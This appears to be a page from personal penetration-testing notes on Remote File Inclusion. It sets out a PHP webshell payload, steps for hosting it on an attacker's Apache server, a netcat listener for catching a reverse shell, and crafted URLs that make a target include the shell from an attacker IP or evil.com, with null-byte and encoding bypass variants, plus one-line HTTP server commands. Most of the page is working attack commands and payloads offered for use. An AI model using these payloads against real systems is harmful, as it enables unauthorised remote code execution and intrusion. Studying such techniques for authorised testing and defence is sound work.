> For the complete documentation index, see [llms.txt](https://davidtancredi.gitbook.io/pentesting-notes/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://davidtancredi.gitbook.io/pentesting-notes/r3dcl1ff/webapp-pentest/file-inclusion/rfi-theory-and-basic-commands.md).

# RFI - Theory & basic commands

**#Basics**

```
Remote file inclusion (RFI)
  
1)evil payload hosted on kali + apache server  

2)nc listener to catch revshell  

…..file=http://192.168.177.119:8080/evil.txt

cat evil.txt
<?php system($_GET['cmd']); ?>
 
The ‘cmd’ in the string will allow to execute any code once in place

3)move the evil.txt  to  /var/www/html/evil.txt

then start apache server:
sudo systemctl start apache2
check that is up and running
service apache2 status

once hosted in /var/www/html you can retrieve the evil webshell from the url
  
…file=http://192.168.119.177/evil.txt&cmd=ipconfig

#At this point escalate running a revshell on target

```

&#x20; **#Assorted tricks**

```
http://target.com/index.php?page=http://$KaliIP/shell.txt   #vanilla
http://target.com/index.php?page=http://$KaliIP/shell.txt%00 #end with nullbyte
http://target.com/index.php?page=http:%252f%252fevil.com%252fshell.txt #encode the request

```

**#Extra server options**&#x20;

```
Python : python –m SimpleHTTPServer 8080
         python3 –m http.server 8080

PHP : php –S 0.0.0.0:8080

Ruby: ruby –run –e httpd . –p 8000 

Busybox :  busybox httpd –f –p 10000

```
